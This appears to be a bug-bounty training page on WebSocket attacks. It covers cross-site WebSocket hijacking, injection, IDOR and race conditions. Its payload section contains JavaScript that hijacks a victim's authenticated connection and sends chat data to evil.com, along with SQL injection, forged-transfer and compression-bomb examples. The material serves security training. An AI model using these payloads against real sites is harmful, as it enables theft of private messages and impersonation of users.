WebSockets
Attacks on real-time bidirectional communications
Quick answer
What is WebSockets?
WebSockets enable two-way communication between client and server. They often have fewer protections than REST APIs: no CORS, no rate limiting, no proper logging.
Severity
High
Frequency
Less common
Payloads
6
Steps
5
Severity
High
Frequency
Less common
Payloads
6
WebSockets aren't subject to the Same-Origin Policy. If the server doesn't validate the Origin header, any website can open an authenticated WebSocket connection using the user's cookies. Messages can also be vulnerable to injections.
Where to look
Real-time chat
Messaging, support, live comments. User messages are processed server-side.
Push notifications
Dashboards with real-time data. The WS connection can leak data.
Collaborative editing
Google Docs-style collaborative editors. Changes synced via WS.
Trading/auctions
Financial platforms with real-time prices. Race conditions in orders.
Methodology
Intercept the WebSocket
Burp → WebSockets history. Analyze the messages sent and received.
Check Origin validation
Does the server accept connections from any origin? If yes → CSWSH.
Test injections in messages
SQLi, XSS, command injection in the JSON fields of the WS messages.
Test IDOR
Change userId or roomId in the messages to access other users' data.
Race conditions
WebSockets are full-duplex — send multiple messages before the server processes the first one.
Real-world case
Cross-Site WebSocket Hijacking → private chat exfiltration
Detect missing Origin validation
The WS server doesn't validate the Origin header — it accepts connections from any domain.
Build a malicious page
A page on evil.com that opens a WebSocket connection to wss://target.com/ws using the user's cookies.
Intercept messages
The page receives all of the user's private chat messages and sends them to the attacker's server.
Send commands
Beyond reading, the attacker can send messages as the victim.
Lesson: WebSockets ignore CORS by design. Without Origin validation, any site can hijack the authenticated user's WS connection.
Payloads
Basic CSWSH
var ws = new WebSocket("wss://target.com/ws");
ws.onmessage = function(e) { fetch("https://evil.com/log?d="+e.data) }SQLi in WS message
{"query": "' OR 1=1--"}IDOR in WS
{"action": "getProfile", "userId": "victim-id-123"}Advanced payloads(account required)
Full CSWSH with exfil
<script>
var ws = new WebSocket("wss://target.com/ws");
ws.onopen = function(){ws.send(JSON.stringify({action:"getChats"}))};
ws.onmessage = function(e){fetch("https://evil.com/steal?d="+btoa(e.data))};
</script>DoS compression bomb
Enviar mensaje con permessage-deflate: datos altamente comprimibles (1MB → 1GB decompressed)
WS race condition
10x simultáneo: {"action":"transfer","amount":100,"to":"attacker"}Exclusive content
Create your free account to access advanced payloads, scripts and bypass techniques
Create free accountTools
Burp Suite WS
Intercept and modify WebSocket messages in real time.
Proxy → WebSockets history → Interceptar mensajes
wscat
CLI WebSocket client for manual connection testing.
wscat -c wss://target.com/ws -H 'Cookie: session=xxx'
Tips
No Origin validation = CSWSH
If the server doesn't validate the Origin header, any website can connect to the user's WS.
WS ignore CORS
WebSockets aren't subject to the Same-Origin Policy. It's a different attack surface from REST.
Less logging = less detection
WS messages often aren't logged like HTTP requests. Ideal for silent attacks.
Contenido relacionado
hunters training
labs from real hacks
completions
paid out for these bugs
The checklist I run on every new target
47 checks ordered by cost: first what can get you in trouble, then the cheap stuff, and finally the expensive stuff — which is where the big bounties are. I'll send it to your inbox right now.
Unsubscribe in one click, from any email.
Practice WebSockets with real labs
Apply these techniques in safe environments based on real bug bounty reports.